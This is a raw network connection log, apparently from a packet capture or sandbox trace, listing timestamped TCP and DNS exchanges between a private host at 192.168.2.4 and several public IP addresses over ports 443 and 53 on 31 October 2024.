Oct 31, 2024 19:19:40.779562950 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.790363073 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.790494919 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.790513039 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.837393045 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.845263958 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.845293045 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.846436977 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.846501112 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.847801924 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.847878933 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.847997904 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.848006964 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.898674965 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.898689985 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.898725986 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.985832930 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.986023903 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.986051083 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.986427069 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.986485958 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.987189054 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.987242937 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.987370968 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.987438917 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.987493992 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.987500906 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.999293089 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.999581099 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.999589920 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.000144958 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.000437975 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.000549078 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.000554085 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.004355907 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:41.006490946 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:41.006553888 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:41.006608963 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:41.007812977 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:41.007829905 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:41.008654118 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.008929968 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.008945942 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.009481907 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.009562016 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.010412931 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.010556936 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.010873079 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.010968924 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.011653900 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.011662006 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.024405003 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.024604082 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.024616957 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.025239944 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.025320053 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.025993109 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.026057959 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.026264906 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.026264906 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.026279926 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.026395082 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.039176941 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.039443970 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.039450884 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.040987015 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.041045904 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.042269945 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.042382002 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.042392015 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.045949936 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:41.047333002 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.048383951 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:41.048448086 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:41.048613071 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:41.048626900 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:41.083410978 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.152107000 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.152137995 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.152184963 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.152187109 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.152194977 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.152211905 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.154448986 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:41.154484034 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:41.154537916 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:41.154932022 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:41.154943943 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:41.223340988 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.223395109 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.260169983 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.260175943 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.353056908 CET	53	51189	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:41.355096102 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.355138063 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.355185032 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.355195045 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.355235100 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.355786085 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.355839968 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.358773947 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.358834982 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.360344887 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.360378027 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.360420942 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.360430002 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.360467911 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.361272097 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.361346006 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.361382008 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.361390114 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.361396074 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.361412048 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.361507893 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.361557961 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.362102032 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.362145901 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.362150908 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.363320112 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.363356113 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.363379002 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.363382101 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.363399029 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.363404989 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.363426924 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.363445997 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.363451958 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.363455057 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.363482952 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.363491058 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.363544941 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.364222050 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.364264965 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.364270926 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.364314079 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.364351988 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.364356041 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.366875887 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:41.366903067 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:41.366964102 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:41.367240906 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.367295980 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.367350101 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.369657993 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:41.369671106 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:41.371058941 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.371112108 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.371157885 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.371206999 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.371275902 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.371675968 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.375726938 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.375758886 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.375770092 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.375781059 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.375814915 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.380287886 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.380335093 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.388397932 CET	51189	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:41.389280081 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.389323950 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.389333963 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.389378071 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.393723011 CET	53	51189	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:41.393996000 CET	51189	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:41.397664070 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.397711992 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.400415897 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.400465965 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.400533915 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.400546074 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.401253939 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.401299953 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.401343107 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.401355982 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.406326056 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.415152073 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.415180922 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.415196896 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.415206909 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.415247917 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.415255070 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.422077894 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.422111988 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.422117949 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.422123909 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.422162056 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.422167063 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.423729897 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.423772097 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.423779964 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.424871922 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.424906015 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.424920082 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.424925089 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.424957037 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.486346006 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.486382961 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.486401081 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.486423969 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.486470938 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.486598015 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.486946106 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.486994982 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.487003088 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.487149954 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.487176895 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.487190962 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.487199068 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.487237930 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.487878084 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.490866899 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.490904093 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.490910053 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.490917921 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.490953922 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.490959883 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.495820999 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.495917082 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.495925903 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.498723030 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.498987913 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.498996019 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.504507065 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.504553080 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.504566908 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.510196924 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.510227919 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.510238886 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.510247946 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.510286093 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.515140057 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.520428896 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.520498037 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.520505905 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.525783062 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.525840998 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.525850058 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.531157970 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.531197071 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.531207085 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.536408901 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.536449909 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.536458015 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.536792994 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.536859035 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:41.536911964 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:41.541758060 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.541802883 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.541810989 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.547096968 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.547139883 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.547153950 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.552666903 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.552700043 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.552706003 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.552715063 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.552755117 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.557748079 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.589524031 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.589571953 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.589585066 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.601720095 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.601749897 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.601758003 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.601771116 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.601807117 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.601814032 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602025032 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602066040 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602087975 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.602094889 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602130890 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602143049 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.602150917 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602186918 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.602799892 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602889061 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.602931023 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.602936983 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.603691101 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.603735924 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.603743076 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.605161905 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.605214119 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.605221033 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.609826088 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.609863043 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.609870911 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.614564896 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.614624023 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.614631891 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.619647980 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.619680882 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.619684935 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.619693995 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.619726896 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.624053955 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.627331972 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.627365112 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.627376080 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.627384901 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.627422094 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.632597923 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.634263039 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.634310007 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.634319067 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.637475967 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.637527943 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.637535095 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.640324116 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.640369892 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.640377045 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.643362045 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.643388987 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.643405914 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.643415928 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.643455982 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.646286964 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.648884058 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.648937941 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.648945093 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.652240992 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.652278900 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.652282953 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.652292967 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.652332067 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.654803038 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.657524109 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.657566071 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.657573938 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.660433054 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.660470963 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.660476923 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.660485983 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.660522938 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.660533905 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.662925005 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.662976027 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.662982941 CET	443	49996	142.250.186.174	192.168.2.4
